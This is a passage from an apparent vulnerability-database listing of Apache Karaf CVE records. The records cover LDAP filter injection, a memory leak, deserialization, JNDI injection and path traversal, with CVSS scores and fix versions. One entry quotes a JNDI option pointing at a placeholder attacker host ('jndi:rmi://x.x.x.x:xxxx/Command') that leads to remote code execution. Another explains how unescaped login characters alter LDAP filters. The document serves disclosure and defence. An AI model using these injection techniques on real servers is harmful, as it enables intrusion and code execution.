          "credits": [
            {
              "lang": "en",
              "type": "reporter",
              "value": "Gjoko Krstic \u003cgjoko@zeroscience.mk\u003e"
            }
          ],
          "descriptions": [
            {
              "lang": "en",
              "supportingMedia": [
                {
                  "base64": false,
                  "type": "text/html",
                  "value": "\u003cp\u003e\u003cspan\u003eLDAPCache\u003c/span\u003e\u0026nbsp;and\u0026nbsp;\u003ccode\u003eLDAPBackingEngine\u003c/code\u003e\u0026nbsp;build LDAP search filters for user lookup and role lookup by textually substituting the placeholders\u0026nbsp;\u003ccode\u003e%u\u003c/code\u003e,\u0026nbsp;\u003ccode\u003e%dn\u003c/code\u003e, and\u0026nbsp;\u003ccode\u003e%fqdn\u003c/code\u003e\u0026nbsp;(drawn from the login name, the resolved user DN, and its fully qualified namespace form) into administrator-configured filter templates (\u003ccode\u003euserFilter\u003c/code\u003e,\u0026nbsp;\u003ccode\u003eroleFilter\u003c/code\u003e). Before the fix, the only sanitization applied to the substituted value was double backslashed:\u003c/p\u003e\u003cdiv\u003e\u003ccode\u003efilter = filter.replaceAll(Pattern.quote(\"%u\"), Matcher.quoteReplacement(user));\u003c/code\u003e\u003c/div\u003e\u003cdiv\u003e\u003ccode\u003efilter = filter.replace(\"\\\\\", \"\\\\\\\\\");\u003c/code\u003e\u003c/div\u003e\u003cdiv\u003e\u003cbr\u003e\u003c/div\u003e\u003cdiv\u003eThis does not escape the other characters RFC 4515 requires escaping in an LDAP search filter:\u0026nbsp;\u003ccode\u003e*\u003c/code\u003e,\u0026nbsp;\u003ccode\u003e(\u003c/code\u003e,\u0026nbsp;\u003ccode\u003e)\u003c/code\u003e, and\u0026nbsp;\u003ccode\u003eNUL\u003c/code\u003e. A login name containing any of these can change the structure of the resulting filter rather than being matched as a literal value (e.g. a crafted username can turn an equality match into a wildcard match, or close/reopen filter clauses), widening what the search returns and potentially causing a login or role lookup to match an LDAP entry other than the intended one, over-granting roles, and depending on deployment-specific filter templates, potentially affecting which account a login resolved to.\u003c/div\u003e\u003cdiv\u003e\u003cbr\u003e\u003c/div\u003e\u003cdiv\u003eIt\u0027s not exploitable through every entry points:\u0026nbsp;\u003ccode\u003eLDAPLoginModule\u003c/code\u003e\u0026nbsp;and\u0026nbsp;\u003ccode\u003eLDAPPubkeyLoginModule\u003c/code\u003e\u0026nbsp;both called\u0026nbsp;\u003ccode\u003eUtil.doRFC2254Encoding()\u003c/code\u003e\u0026nbsp;(correct RFC 4515 escaping) on the login name before handing it to\u0026nbsp;\u003ccode\u003eLDAPCache\u003c/code\u003e, which masked the missing escaping in\u0026nbsp;\u003ccode\u003eLDAPCache\u003c/code\u003e\u0026nbsp;for those two call paths. Using\u0026nbsp;\u003ccode\u003eLDAPCache\u003c/code\u003e\u0026nbsp;directly (bypassing the login modules) does not reproduce through the normal\u0026nbsp;\u003ccode\u003eLDAPLoginModule\u003c/code\u003e/\u003ccode\u003eLDAPPubkeyLoginModule\u003c/code\u003e\u0026nbsp;authentication flow for this reason. It does reproduce through two other call paths that reach\u0026nbsp;\u003ccode\u003eLDAPCache\u003c/code\u003e/\u003ccode\u003eLDAPBackingEngine\u003c/code\u003e\u0026nbsp;without any prior escaping:\u003c/div\u003e\u003cdiv\u003e\u003cul\u003e\u003cli\u003e\u003ccode\u003eGSSAPILdapLoginModule\u003c/code\u003e\u0026nbsp;passes the\u0026nbsp;\u003ccode\u003eNameCallback\u003c/code\u003e\u0026nbsp;name straight through, unescaped.\u003c/li\u003e\u003cli\u003e\u003ccode\u003eLDAPBackingEngine\u003c/code\u003e\u0026nbsp;(\u003ccode\u003elistRoles\u003c/code\u003e) passes\u0026nbsp;\u003ccode\u003eprincipal.getName()\u003c/code\u003e\u0026nbsp;straight through, unescaped.\u003c/li\u003e\u003c/ul\u003e\u003cdiv\u003e\u003cbr\u003e\u003c/div\u003e\u003c/div\u003e"
                }
              ],
              "value": "LDAPCache\u00a0and\u00a0LDAPBackingEngine\u00a0build LDAP search filters for user lookup and role lookup by textually substituting the placeholders\u00a0%u,\u00a0%dn, and\u00a0%fqdn\u00a0(drawn from the login name, the resolved user DN, and its fully qualified namespace form) into administrator-configured filter templates (userFilter,\u00a0roleFilter). Before the fix, the only sanitization applied to the substituted value was double backslashed:\n\nfilter = filter.replaceAll(Pattern.quote(\"%u\"), Matcher.quoteReplacement(user));\n\nfilter = filter.replace(\"\\\\\", \"\\\\\\\\\");\n\n\n\n\nThis does not escape the other characters RFC 4515 requires escaping in an LDAP search filter:\u00a0*,\u00a0(,\u00a0), and\u00a0NUL. A login name containing any of these can change the structure of the resulting filter rather than being matched as a literal value (e.g. a crafted username can turn an equality match into a wildcard match, or close/reopen filter clauses), widening what the search returns and potentially causing a login or role lookup to match an LDAP entry other than the intended one, over-granting roles, and depending on deployment-specific filter templates, potentially affecting which account a login resolved to.\n\n\n\n\nIt\u0027s not exploitable through every entry points:\u00a0LDAPLoginModule\u00a0and\u00a0LDAPPubkeyLoginModule\u00a0both called\u00a0Util.doRFC2254Encoding()\u00a0(correct RFC 4515 escaping) on the login name before handing it to\u00a0LDAPCache, which masked the missing escaping in\u00a0LDAPCache\u00a0for those two call paths. Using\u00a0LDAPCache\u00a0directly (bypassing the login modules) does not reproduce through the normal\u00a0LDAPLoginModule/LDAPPubkeyLoginModule\u00a0authentication flow for this reason. It does reproduce through two other call paths that reach\u00a0LDAPCache/LDAPBackingEngine\u00a0without any prior escaping:\n\n  *  GSSAPILdapLoginModule\u00a0passes the\u00a0NameCallback\u00a0name straight through, unescaped.\n  *  LDAPBackingEngine\u00a0(listRoles) passes\u00a0principal.getName()\u00a0straight through, unescaped."
            }
          ],
          "metrics": [
            {
              "other": {
                "content": {
                  "text": "moderate"
                },
                "type": "Textual description of severity"
              },
              "scenarios": [
                {
                  "lang": "en",
                  "value": "GENERAL"
                }
              ]
            }
          ],
          "problemTypes": [
            {
              "descriptions": [
                {
                  "cweId": "CWE-90",
                  "description": "CWE-90 Improper neutralization of special elements used in an LDAP query (\u0027LDAP injection\u0027)",
                  "lang": "en",
                  "type": "CWE"
                }
              ]
            }
          ],
          "providerMetadata": {
            "dateUpdated": "2026-09-28T09:34:33.253Z",
            "orgId": "f0158376-9dc2-43b6-827c-5f631a4d8d09",
            "shortName": "apache"
          },
          "references": [
            {
              "tags": [
                "vendor-advisory"
              ],
              "url": "https://karaf.apache.org/security/cve-2026-90979.txt"
            }
          ],
          "source": {
            "advisory": "https://karaf.apache.org/security/cve-2026-90979.txt",
            "defect": [
              "https://github.com/apache/karaf/pull/2880"
            ],
            "discovery": "EXTERNAL"
          },
          "title": "Apache Karaf: LDAP filter injection in JAAS LDAP login modules",
          "x_generator": {
            "engine": "Vulnogram 1.0.3"
          }
        }
      },
      "cveMetadata": {
        "assignerOrgId": "f0158376-9dc2-43b6-827c-5f631a4d8d09",
        "assignerShortName": "apache",
        "cveId": "CVE-2026-90979",
        "datePublished": "2026-09-28T09:34:33.253Z",
        "dateReserved": "2026-09-14T13:42:44.229Z",
        "dateUpdated": "2026-09-30T19:53:57.685Z",
        "state": "PUBLISHED"
      },
      "dataType": "CVE_RECORD",
      "dataVersion": "5.2"
    }

    CVE-2026-92230 (GCVE-0-2026-92230)

    Vulnerability from nvd – Published: 2026-09-17 18:38 – Updated: 2026-09-18 13:33
    VLAI
    Title
    Apache Karaf: Improper release of ClassLoader references via static ThreadLocal caching
    Summary
    Apache Karaf's XmlUtils cached XML parser/transformer factories in static ThreadLocal fields on long-lived container threads. Because a ThreadLocal value outlives the OSGi bundle that created it, repeated bundle or feature install, update, or refresh operations can leave successive bundle ClassLoader's pinned in memory and unreachable for garbage collection, leading to unbounded Metaspace growth and eventual denial of service of the Karaf instance.
    SSVC
    Exploitation: none Automatable: yes Technical Impact: partial
    CISA Coordinator · CISA-ADP (v2.0.3)
    Decision recorded 2026-09-18 13:32 UTC
    CWE
    • CWE-401 - Missing release of memory after effective lifetime
    • CWE-772 - Missing release of resource after effective lifetime
    Impacted products
    Vendor Product Version
    Apache Software Foundation Apache Karaf Affected: 0 , < 4.4.11 (semver)
    Create a notification for this product.
    Show details on NVD website

    {
      "containers": {
        "adp": [
          {
            "providerMetadata": {
              "dateUpdated": "2026-09-17T19:11:48.291Z",
              "orgId": "af854a3a-2127-422b-91ae-364da2661108",
              "shortName": "CVE"
            },
            "references": [
              {
                "url": "http://www.openwall.com/lists/oss-security/2026/09/17/3"
              }
            ],
            "title": "CVE Program Container"
          },
          {
            "metrics": [
              {
                "cvssV3_1": {
                  "attackComplexity": "LOW",
                  "attackVector": "NETWORK",
                  "availabilityImpact": "HIGH",
                  "baseScore": 7.5,
                  "baseSeverity": "HIGH",
                  "confidentialityImpact": "NONE",
                  "integrityImpact": "NONE",
                  "privilegesRequired": "NONE",
                  "scope": "UNCHANGED",
                  "userInteraction": "NONE",
                  "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
                  "version": "3.1"
                }
              },
              {
                "other": {
                  "content": {
                    "id": "CVE-2026-92230",
                    "options": [
                      {
                        "Exploitation": "none"
                      },
                      {
                        "Automatable": "yes"
                      },
                      {
                        "Technical Impact": "partial"
                      }
                    ],
                    "role": "CISA Coordinator",
                    "timestamp": "2026-09-18T13:32:59.478507Z",
                    "version": "2.0.3"
                  },
                  "type": "ssvc"
                }
              }
            ],
            "providerMetadata": {
              "dateUpdated": "2026-09-18T13:33:04.842Z",
              "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
              "shortName": "CISA-ADP"
            },
            "title": "CISA ADP Vulnrichment"
          }
        ],
        "cna": {
          "affected": [
            {
              "defaultStatus": "unaffected",
              "product": "Apache Karaf",
              "vendor": "Apache Software Foundation",
              "versions": [
                {
                  "lessThan": "4.4.11",
                  "status": "affected",
                  "version": "0",
                  "versionType": "semver"
                }
              ]
            }
          ],
          "credits": [
            {
              "lang": "en",
              "type": "reporter",
              "value": "Baoquan Cui \u0026 Yucheng Qiu"
            }
          ],
          "descriptions": [
            {
              "lang": "en",
              "supportingMedia": [
                {
                  "base64": false,
                  "type": "text/html",
                  "value": "Apache Karaf\u0027s XmlUtils cached XML parser/transformer factories in static ThreadLocal fields on long-lived container threads. Because a ThreadLocal value outlives the OSGi bundle that created it, repeated bundle or feature install, update, or refresh operations can leave successive bundle ClassLoader\u0027s pinned in memory and unreachable for garbage collection, leading to unbounded Metaspace growth and eventual denial of service of the Karaf instance."
                }
              ],
              "value": "Apache Karaf\u0027s XmlUtils cached XML parser/transformer factories in static ThreadLocal fields on long-lived container threads. Because a ThreadLocal value outlives the OSGi bundle that created it, repeated bundle or feature install, update, or refresh operations can leave successive bundle ClassLoader\u0027s pinned in memory and unreachable for garbage collection, leading to unbounded Metaspace growth and eventual denial of service of the Karaf instance."
            }
          ],
          "metrics": [
            {
              "other": {
                "content": {
                  "text": "moderate"
                },
                "type": "Textual description of severity"
              },
              "scenarios": [
                {
                  "lang": "en",
                  "value": "GENERAL"
                }
              ]
            }
          ],
          "problemTypes": [
            {
              "descriptions": [
                {
                  "cweId": "CWE-401",
                  "description": "CWE-401 Missing release of memory after effective lifetime",
                  "lang": "en",
                  "type": "CWE"
                }
              ]
            },
            {
              "descriptions": [
                {
                  "cweId": "CWE-772",
                  "description": "CWE-772 Missing release of resource after effective lifetime",
                  "lang": "en",
                  "type": "CWE"
                }
              ]
            }
          ],
          "providerMetadata": {
            "dateUpdated": "2026-09-17T18:38:29.556Z",
            "orgId": "f0158376-9dc2-43b6-827c-5f631a4d8d09",
            "shortName": "apache"
          },
          "references": [
            {
              "tags": [
                "vendor-advisory"
              ],
              "url": "https://lists.apache.org/thread/pxgqjvsmzgpvgly1qf1w300qxsp8bxdj"
            }
          ],
          "source": {
            "advisory": "https://karaf.apache.org/security/cve-2026-92230.txt",
            "defect": [
              "https://github.com/apache/karaf/issues/2278"
            ],
            "discovery": "EXTERNAL"
          },
          "title": "Apache Karaf: Improper release of ClassLoader references via static ThreadLocal caching",
          "x_generator": {
            "engine": "Vulnogram 1.0.3"
          }
        }
      },
      "cveMetadata": {
        "assignerOrgId": "f0158376-9dc2-43b6-827c-5f631a4d8d09",
        "assignerShortName": "apache",
        "cveId": "CVE-2026-92230",
        "datePublished": "2026-09-17T18:38:29.556Z",
        "dateReserved": "2026-09-15T19:05:23.880Z",
        "dateUpdated": "2026-09-18T13:33:04.842Z",
        "state": "PUBLISHED"
      },
      "dataType": "CVE_RECORD",
      "dataVersion": "5.2"
    }

    CVE-2026-24656 (GCVE-0-2026-24656)

    Vulnerability from nvd – Published: 2026-01-26 09:41 – Updated: 2026-01-26 18:35
    VLAI
    Title
    Apache Karaf: Decanter log-socket collector has deserialization vulnerability
    Summary
    Deserialization of Untrusted Data vulnerability in Apache Karaf Decanter. The Decanter log socket collector exposes the port 4560, without authentication. If the collector exposes allowed classes property, this configuration can be bypassed. It means that the log socket collector is vulnerable to deserialization of untrusted data, eventually causing DoS. NB: Decanter log socket collector is not installed by default. Users who have not installed Decanter log socket are not impacted by this issue. This issue affects Apache Karaf Decanter before 2.12.0. Users are recommended to upgrade to version 2.12.0, which fixes the issue.
    SSVC
    Exploitation: none Automatable: no Technical Impact: partial
    CISA Coordinator · CISA-ADP (v2.0.3)
    Decision recorded 2026-01-26 18:35 UTC
    CWE
    • CWE-502 - Deserialization of Untrusted Data
    Impacted products
    Vendor Product Version
    Apache Software Foundation Apache Karaf Affected: 0 , < 2.12.0 (semver)
    Unaffected: 2.12.0 (semver)
    Create a notification for this product.
    Credits
    Show details on NVD website

    {
      "containers": {
        "adp": [
          {
            "providerMetadata": {
              "dateUpdated": "2026-01-26T10:09:04.018Z",
              "orgId": "af854a3a-2127-422b-91ae-364da2661108",
              "shortName": "CVE"
            },
            "references": [
              {
                "url": "http://www.openwall.com/lists/oss-security/2026/01/24/1"
              }
            ],
            "title": "CVE Program Container"
          },
          {
            "metrics": [
              {
                "cvssV3_1": {
                  "attackComplexity": "HIGH",
                  "attackVector": "NETWORK",
                  "availabilityImpact": "LOW",
                  "baseScore": 3.7,
                  "baseSeverity": "LOW",
                  "confidentialityImpact": "NONE",
                  "integrityImpact": "NONE",
                  "privilegesRequired": "NONE",
                  "scope": "UNCHANGED",
                  "userInteraction": "NONE",
                  "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L",
                  "version": "3.1"
                }
              },
              {
                "other": {
                  "content": {
                    "id": "CVE-2026-24656",
                    "options": [
                      {
                        "Exploitation": "none"
                      },
                      {
                        "Automatable": "no"
                      },
                      {
                        "Technical Impact": "partial"
                      }
                    ],
                    "role": "CISA Coordinator",
                    "timestamp": "2026-01-26T18:35:47.421252Z",
                    "version": "2.0.3"
                  },
                  "type": "ssvc"
                }
              }
            ],
            "providerMetadata": {
              "dateUpdated": "2026-01-26T18:35:51.514Z",
              "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
              "shortName": "CISA-ADP"
            },
            "title": "CISA ADP Vulnrichment"
          }
        ],
        "cna": {
          "affected": [
            {
              "collectionURL": "https://repo.maven.apache.org/maven2",
              "defaultStatus": "unaffected",
              "packageName": "org.apache.karaf.decanter.collector:org.apache.karaf.decanter.collector.log.socket",
              "product": "Apache Karaf",
              "vendor": "Apache Software Foundation",
              "versions": [
                {
                  "lessThan": "2.12.0",
                  "status": "affected",
                  "version": "0",
                  "versionType": "semver"
                },
                {
                  "status": "unaffected",
                  "version": "2.12.0",
                  "versionType": "semver"
                }
              ]
            }
          ],
          "credits": [
            {
              "lang": "en",
              "type": "finder",
              "value": "r00t4dm"
            }
          ],
          "descriptions": [
            {
              "lang": "en",
              "supportingMedia": [
                {
                  "base64": false,
                  "type": "text/html",
                  "value": "\u003cp\u003eDeserialization of Untrusted Data vulnerability in Apache Karaf Decanter.\u003c/p\u003e\u003cbr\u003eThe Decanter log socket collector exposes the port 4560, without authentication. If the collector exposes allowed classes property, this configuration can be bypassed.\u003cbr\u003eIt means that the log socket collector is vulnerable to deserialization of untrusted data, eventually causing DoS.\u003cbr\u003e\u003cbr\u003e\u003cbr\u003eNB: Decanter log socket collector is not installed by default. Users who have not installed Decanter log socket are not impacted by this issue.\u003cbr\u003e\u003cbr\u003e\u003cp\u003eThis issue affects Apache Karaf Decanter before 2.12.0.\u003c/p\u003e\u003cp\u003eUsers are recommended to upgrade to version 2.12.0, which fixes the issue.\u003c/p\u003e"
                }
              ],
              "value": "Deserialization of Untrusted Data vulnerability in Apache Karaf Decanter.\n\n\nThe Decanter log socket collector exposes the port 4560, without authentication. If the collector exposes allowed classes property, this configuration can be bypassed.\nIt means that the log socket collector is vulnerable to deserialization of untrusted data, eventually causing DoS.\n\n\nNB: Decanter log socket collector is not installed by default. Users who have not installed Decanter log socket are not impacted by this issue.\n\nThis issue affects Apache Karaf Decanter before 2.12.0.\n\nUsers are recommended to upgrade to version 2.12.0, which fixes the issue."
            }
          ],
          "metrics": [
            {
              "other": {
                "content": {
                  "text": "important"
                },
                "type": "Textual description of severity"
              }
            }
          ],
          "problemTypes": [
            {
              "descriptions": [
                {
                  "cweId": "CWE-502",
                  "description": "CWE-502 Deserialization of Untrusted Data",
                  "lang": "en",
                  "type": "CWE"
                }
              ]
            }
          ],
          "providerMetadata": {
            "dateUpdated": "2026-01-26T09:41:24.356Z",
            "orgId": "f0158376-9dc2-43b6-827c-5f631a4d8d09",
            "shortName": "apache"
          },
          "references": [
            {
              "tags": [
                "vendor-advisory"
              ],
              "url": "https://lists.apache.org/thread/dc5wmdn6hyc992olntkl75kk04ndzx34"
            }
          ],
          "source": {
            "advisory": "https://karaf.apache.org/security/cve-2026-24656.txt",
            "defect": [
              "https://github.com/apache/karaf-decanter/issues/555"
            ],
            "discovery": "EXTERNAL"
          },
          "title": "Apache Karaf: Decanter log-socket collector has deserialization vulnerability",
          "x_generator": {
            "engine": "Vulnogram 0.2.0"
          }
        }
      },
      "cveMetadata": {
        "assignerOrgId": "f0158376-9dc2-43b6-827c-5f631a4d8d09",
        "assignerShortName": "apache",
        "cveId": "CVE-2026-24656",
        "datePublished": "2026-01-26T09:41:24.356Z",
        "dateReserved": "2026-01-23T17:55:14.286Z",
        "dateUpdated": "2026-01-26T18:35:51.514Z",
        "state": "PUBLISHED"
      },
      "dataType": "CVE_RECORD",
      "dataVersion": "5.2"
    }

    CVE-2022-40145 (GCVE-0-2022-40145)

    Vulnerability from nvd – Published: 2022-12-21 15:23 – Updated: 2025-04-15 18:03
    VLAI
    Title
    Apache Karaf: JDBC JAAS LDAP injection
    Summary
    This vulnerable is about a potential code injection when an attacker has control of the target LDAP server using in the JDBC JNDI URL. The function jaas.modules.src.main.java.porg.apache.karaf.jass.modules.jdbc.JDBCUtils#doCreateDatasource use InitialContext.lookup(jndiName) without filtering. An user can modify `options.put(JDBCUtils.DATASOURCE, "osgi:" + DataSource.class.getName());` to `options.put(JDBCUtils.DATASOURCE,"jndi:rmi://x.x.x.x:xxxx/Command");` in JdbcLoginModuleTest#setup. This is vulnerable to a remote code execution (RCE) attack when a configuration uses a JNDI LDAP data source URI when an attacker has control of the target LDAP server.This issue affects all versions of Apache Karaf up to 4.4.1 and 4.3.7. We encourage the users to upgrade to Apache Karaf at least 4.4.2 or 4.3.8
    SSVC
    Exploitation: none Automatable: yes Technical Impact: total
    CISA Coordinator · CISA-ADP (v2.0.3)
    Decision recorded 2025-04-15 18:02 UTC
    CWE
    • CWE-74 - Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection')
    • CWE-20 - Improper Input Validation
    References
    Impacted products
    Vendor Product Version
    Apache Software Foundation Apache Karaf Affected: 4.4.0 , < 4.4.2 (maven)
    Affected: 0 , < 4.3.8 (maven)
    Create a notification for this product.
    Show details on NVD website

    {
      "containers": {
        "adp": [
          {
            "providerMetadata": {
              "dateUpdated": "2024-08-03T12:14:39.957Z",
              "orgId": "af854a3a-2127-422b-91ae-364da2661108",
              "shortName": "CVE"
            },
            "references": [
              {
                "tags": [
                  "vendor-advisory",
                  "x_transferred"
                ],
                "url": "https://karaf.apache.org/security/cve-2022-40145.txt"
              }
            ],
            "title": "CVE Program Container"
          },
          {
            "metrics": [
              {
                "cvssV3_1": {
                  "attackComplexity": "LOW",
                  "attackVector": "NETWORK",
                  "availabilityImpact": "HIGH",
                  "baseScore": 9.8,
                  "baseSeverity": "CRITICAL",
                  "confidentialityImpact": "HIGH",
                  "integrityImpact": "HIGH",
                  "privilegesRequired": "NONE",
                  "scope": "UNCHANGED",
                  "userInteraction": "NONE",
                  "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
                  "version": "3.1"
                }
              },
              {
                "other": {
                  "content": {
                    "id": "CVE-2022-40145",
                    "options": [
                      {
                        "Exploitation": "none"
                      },
                      {
                        "Automatable": "yes"
                      },
                      {
                        "Technical Impact": "total"
                      }
                    ],
                    "role": "CISA Coordinator",
                    "timestamp": "2025-04-15T18:02:30.458673Z",
                    "version": "2.0.3"
                  },
                  "type": "ssvc"
                }
              }
            ],
            "providerMetadata": {
              "dateUpdated": "2025-04-15T18:03:47.618Z",
              "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
              "shortName": "CISA-ADP"
            },
            "title": "CISA ADP Vulnrichment"
          }
        ],
        "cna": {
          "affected": [
            {
              "defaultStatus": "unaffected",
              "product": "Apache Karaf",
              "vendor": "Apache Software Foundation",
              "versions": [
                {
                  "lessThan": "4.4.2",
                  "status": "affected",
                  "version": "4.4.0",
                  "versionType": "maven"
                },
                {
                  "lessThan": "4.3.8",
                  "status": "affected",
                  "version": "0",
                  "versionType": "maven"
                }
              ]
            }
          ],
          "credits": [
            {
              "lang": "en",
              "type": "reporter",
              "value": "Xun Bai \u003cbbbbear68@gmail.com\u003e"
            }
          ],
          "descriptions": [
            {
              "lang": "en",
              "supportingMedia": [
                {
                  "base64": false,
                  "type": "text/html",
                  "value": "\u003cspan style=\"background-color: rgb(255, 255, 255);\"\u003eThis vulnerable is about a potential code injection when an attacker has control of the target LDAP server using in the JDBC JNDI URL.\u003cbr\u003e\u003cbr\u003eThe function jaas.modules.src.main.java.por\u003c/span\u003e\u003cspan style=\"background-color: rgb(255, 255, 255);\"\u003eg.apache.karaf.jass.modules.\u003c/span\u003e\u003cspan style=\"background-color: rgb(255, 255, 255);\"\u003ejdbc.JDBCUtils#doCreateDatasou\u003c/span\u003e\u003cspan style=\"background-color: rgb(255, 255, 255);\"\u003erce\u003c/span\u003e\u003cbr\u003e\u003cspan style=\"background-color: rgb(255, 255, 255);\"\u003euse InitialContext.lookup(jndiName\u003c/span\u003e\u003cspan style=\"background-color: rgb(255, 255, 255);\"\u003e) without filtering.\u003cbr\u003eAn user can modify\u0026nbsp;\u003c/span\u003e\u003cspan style=\"background-color: rgb(255, 255, 255);\"\u003e`options.put(JDBCUtils.DATASOU\u003c/span\u003e\u003cspan style=\"background-color: rgb(255, 255, 255);\"\u003eRCE, \"osgi:\" +\u0026nbsp;\u003c/span\u003e\u003cspan style=\"background-color: rgb(255, 255, 255);\"\u003eDataSource.class.getName());` to `options.put(JDBCUtils.DATASOU\u003c/span\u003e\u003cspan style=\"background-color: rgb(255, 255, 255);\"\u003eRCE,\u003c/span\u003e\u003cspan style=\"background-color: rgb(255, 255, 255);\"\u003e\"jndi:rmi://x.x.x.x:xxxx/Comma\u003c/span\u003e\u003cspan style=\"background-color: rgb(255, 255, 255);\"\u003end\");` in JdbcLoginModuleTest#setup.\u003c/span\u003e\u003cbr\u003e\u003cbr\u003e\u003cspan style=\"background-color: rgb(255, 255, 255);\"\u003eThis is vulnerable to a remote code execution (RCE) attack when a\u003c/span\u003e\u003cbr\u003e\u003cspan style=\"background-color: rgb(255, 255, 255);\"\u003econfiguration uses a JNDI LDAP data source URI when an attacker has\u003c/span\u003e\u003cbr\u003e\u003cspan style=\"background-color: rgb(255, 255, 255);\"\u003econtrol of the target LDAP server.\u003c/span\u003e\u003cp\u003eThis issue affects all versions of Apache Karaf up to 4.4.1 and 4.3.7.\u003c/p\u003eWe encourage the users to upgrade to Apache Karaf at least 4.4.2 or 4.3.8"
                }
              ],
              "value": "This vulnerable is about a potential code injection when an attacker has control of the target LDAP server using in the JDBC JNDI URL.\n\nThe function jaas.modules.src.main.java.porg.apache.karaf.jass.modules.jdbc.JDBCUtils#doCreateDatasource\nuse InitialContext.lookup(jndiName) without filtering.\nAn user can modify\u00a0`options.put(JDBCUtils.DATASOURCE, \"osgi:\" +\u00a0DataSource.class.getName());` to `options.put(JDBCUtils.DATASOURCE,\"jndi:rmi://x.x.x.x:xxxx/Command\");` in JdbcLoginModuleTest#setup.\n\nThis is vulnerable to a remote code execution (RCE) attack when a\nconfiguration uses a JNDI LDAP data source URI when an attacker has\ncontrol of the target LDAP server.This issue affects all versions of Apache Karaf up to 4.4.1 and 4.3.7.\n\nWe encourage the users to upgrade to Apache Karaf at least 4.4.2 or 4.3.8"
            }
          ],
          "metrics": [
            {
              "other": {
                "content": {
                  "text": "low"
                },
                "type": "Textual description of severity"
              }
            }
          ],
          "problemTypes": [
            {
              "descriptions": [
                {
                  "cweId": "CWE-74",
                  "description": "CWE-74 Improper Neutralization of Special Elements in Output Used by a Downstream Component (\u0027Injection\u0027)",
                  "lang": "en",
                  "type": "CWE"
                }
              ]
            },
            {
              "descriptions": [
                {
                  "cweId": "CWE-20",
                  "description": "CWE-20 Improper Input Validation",
                  "lang": "en",
                  "type": "CWE"
                }
              ]
            }
          ],
          "providerMetadata": {
            "dateUpdated": "2022-12-21T15:23:42.847Z",
            "orgId": "f0158376-9dc2-43b6-827c-5f631a4d8d09",
            "shortName": "apache"
          },
          "references": [
            {
              "tags": [
                "vendor-advisory"
              ],
              "url": "https://karaf.apache.org/security/cve-2022-40145.txt"
            }
          ],
          "source": {
            "defect": [
              "KARAF-7568"
            ],
            "discovery": "EXTERNAL"
          },
          "title": "Apache Karaf: JDBC JAAS LDAP injection",
          "x_generator": {
            "engine": "Vulnogram 0.1.0-dev"
          }
        }
      },
      "cveMetadata": {
        "assignerOrgId": "f0158376-9dc2-43b6-827c-5f631a4d8d09",
        "assignerShortName": "apache",
        "cveId": "CVE-2022-40145",
        "datePublished": "2022-12-21T15:23:42.847Z",
        "dateReserved": "2022-09-07T08:02:30.677Z",
        "dateUpdated": "2025-04-15T18:03:47.618Z",
        "state": "PUBLISHED"
      },
      "dataType": "CVE_RECORD",
      "dataVersion": "5.1"
    }

    CVE-2022-22932 (GCVE-0-2022-22932)

    Vulnerability from nvd – Published: 2022-01-26 11:10 – Updated: 2024-08-03 03:28
    VLAI
    Title
    Path traversal flaws
    Summary
    Apache Karaf obr:* commands and run goal on the karaf-maven-plugin have partial path traversal which allows to break out of expected folder. The risk is low as obr:* commands are not very used and the entry is set by user. This has been fixed in revision: https://gitbox.apache.org/repos/asf?p=karaf.git;h=36a2bc4 https://gitbox.apache.org/repos/asf?p=karaf.git;h=52b70cf Mitigation: Apache Karaf users should upgrade to 4.2.15 or 4.3.6 or later as soon as possible, or use correct path. JIRA Tickets: https://issues.apache.org/jira/browse/KARAF-7326
    Severity
    No CVSS data available.
    CWE
    • Path traversal flaws
    References
    Impacted products
    Vendor Product Version
    Apache Software Foundation Apache Karaf Affected: Apache Karaf , < 4.2.15 (custom)
    Create a notification for this product.
    Show details on NVD website

    {
      "containers": {
        "adp": [
          {
            "providerMetadata": {
              "dateUpdated": "2024-08-03T03:28:42.479Z",
              "orgId": "af854a3a-2127-422b-91ae-364da2661108",
              "shortName": "CVE"
            },
            "references": [
              {
                "tags": [
                  "x_refsource_MISC",
                  "x_transferred"
                ],
                "url": "https://karaf.apache.org/security/cve-2022-22932.txt"
              }
            ],
            "title": "CVE Program Container"
          }
        ],
        "cna": {
          "affected": [
            {
              "product": "Apache Karaf",
              "vendor": "Apache Software Foundation",
              "versions": [
                {
                  "changes": [
                    {
                      "at": "4.3.6",
                      "status": "unaffected"
                    }
                  ],
                  "lessThan": "4.2.15",
                  "status": "affected",
                  "version": "Apache Karaf",
                  "versionType": "custom"
                }
              ]
            }
          ],
          "credits": [
            {
              "lang": "en",
              "value": "This issue was discovered and reported by GHSL team member Jaroslav Lobacevski"
            }
          ],
          "descriptions": [
            {
              "lang": "en",
              "value": "Apache Karaf obr:* commands and run goal on the karaf-maven-plugin have partial path traversal which allows to break out of expected folder. The risk is low as obr:* commands are not very used and the entry is set by user. This has been fixed in revision: https://gitbox.apache.org/repos/asf?p=karaf.git;h=36a2bc4 https://gitbox.apache.org/repos/asf?p=karaf.git;h=52b70cf Mitigation: Apache Karaf users should upgrade to 4.2.15 or 4.3.6 or later as soon as possible, or use correct path. JIRA Tickets: https://issues.apache.org/jira/browse/KARAF-7326"
            }
          ],
          "metrics": [
            {
              "other": {
                "content": {
                  "other": "The risk is low as obr:* commands are not very used and the entry is set by user."
                },
                "type": "unknown"
              }
            }
          ],
          "problemTypes": [
            {
              "descriptions": [
                {
                  "description": "Path traversal flaws",
                  "lang": "en",
                  "type": "text"
                }
              ]
            }
          ],
          "providerMetadata": {
            "dateUpdated": "2022-01-26T11:10:12.000Z",
            "orgId": "f0158376-9dc2-43b6-827c-5f631a4d8d09",
            "shortName": "apache"
          },
          "references": [
            {
              "tags": [
                "x_refsource_MISC"
              ],
              "url": "https://karaf.apache.org/security/cve-2022-22932.txt"
            }
          ],
          "source": {
            "discovery": "UNKNOWN"
          },
          "title": "Path traversal flaws",
          "workarounds": [
            {
              "lang": "en",
              "value": "Apache Karaf users should upgrade to 4.2.15 or 4.3.6 or later as soon as possible, or use correct path."
            }
          ],
          "x_generator": {
            "engine": "Vulnogram 0.0.9"
          },
          "x_legacyV4Record": {
            "CVE_data_meta": {
